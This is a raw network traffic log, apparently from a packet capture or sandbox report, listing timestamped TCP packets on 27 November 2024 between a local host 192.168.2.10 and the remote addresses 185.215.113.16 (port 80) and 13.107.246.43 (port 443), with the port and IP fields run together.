                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.670299053 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.675611973 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.675753117 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.675827980 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.680758953 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.680895090 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.681025028 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.686136961 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.686237097 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.686302900 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.691451073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.691524982 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.691597939 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.696407080 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.696491957 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.696574926 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.701602936 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.701731920 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.701787949 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.706830978 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.706928968 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.707024097 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.712244034 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.712362051 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.712416887 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.717189074 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.717279911 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.717359066 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.722574949 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.722632885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.722716093 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.727619886 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.727668047 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.727741003 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.732801914 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.732857943 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.732912064 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.733319044 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.733906031 CET49793443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.733936071 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.734375000 CET49793443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.734381914 CET4434979313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.738176107 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.738235950 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.738372087 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.743164062 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.743206024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.743298054 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.748490095 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.748517036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.748606920 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.753704071 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.753909111 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.753983974 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.758802891 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.758894920 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.759054899 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.764003992 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.764045954 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.764182091 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.769581079 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.826107979 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.864022970 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.864042997 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.864212036 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.865880966 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.866485119 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.866592884 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.866611958 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.870743036 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.870868921 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.871011019 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.876334906 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.876351118 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.876420975 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.879338026 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.879442930 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.879511118 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.883681059 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.883755922 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.883816004 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.887558937 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.887618065 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.887733936 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.891733885 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.891844988 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.891936064 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.895436049 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.895544052 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.895551920 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.899239063 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.899437904 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.899512053 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.903114080 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.903223991 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.903320074 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.906971931 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.907004118 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.907042027 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.910936117 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.911004066 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.911088943 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.915719986 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.915798903 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.915834904 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.919816017 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.919894934 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.919953108 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.923348904 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.923420906 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.923466921 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.926903963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.926986933 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.927056074 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.930990934 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.931073904 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.931153059 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.934883118 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.935029984 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.935070038 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.938471079 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.938488960 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.938604116 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.943422079 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.943562984 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.943588972 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.947196960 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.947267056 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.947300911 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.950555086 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.950613976 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.950617075 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.954427004 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.954497099 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.954562902 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.958323956 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.958460093 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.958520889 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.962552071 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.962722063 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.962758064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.966155052 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.966222048 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.966392040 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.970005035 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.970141888 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.970144987 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.973503113 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.973556042 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.973563910 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.976731062 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.976768017 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.976908922 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.980068922 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.980113983 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.980191946 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.983805895 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.983890057 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.983973026 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.987051010 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.987092018 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.987138987 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.990818977 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.990895987 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.990977049 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.993844032 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.993951082 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.994004965 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.997040033 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.997103930 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:57.997172117 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.000791073 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.000864029 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.011830091 CET4434979113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.011902094 CET4434979113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.011981010 CET49791443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.012176037 CET49791443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.012176037 CET49791443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.012197018 CET4434979113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.012206078 CET4434979113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.015353918 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.015387058 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.015476942 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.015609980 CET49797443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.015626907 CET4434979713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.065757990 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.065782070 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.065853119 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.067117929 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.067249060 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.067337990 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.069540024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.069555998 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.069621086 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.072613001 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.072725058 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.072793961 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.075536966 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.075645924 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.076620102 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.078248024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.078388929 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.078480005 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.080868959 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.080981016 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.081043005 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.083647013 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.083887100 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.085653067 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.086348057 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.086496115 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.088521004 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.089049101 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.089189053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.091747999 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.091907024 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.091944933 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.094717026 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.094775915 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.094779968 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.097223997 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.097265959 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.097281933 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.097403049 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.099864006 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.099936008 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.099984884 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.102366924 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.102391005 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.102440119 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.104723930 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.104934931 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.105025053 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.107176065 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.107379913 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.109369993 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.109401941 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.109786987 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.109786987 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.111607075 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.111659050 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.111753941 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.114012957 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.114104033 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.114965916 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.116332054 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.116408110 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.116457939 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.118644953 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.118731022 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.119342089 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.121185064 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.121210098 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.121396065 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.123193979 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.123363018 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.124468088 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.125488997 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.125601053 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.127465963 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.128089905 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.128237963 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.129427910 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.129486084 CET4979280192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.129523039 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.131184101 CET8049792185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:58.131253958 CET8049792185.215.113.16192.168.2.10
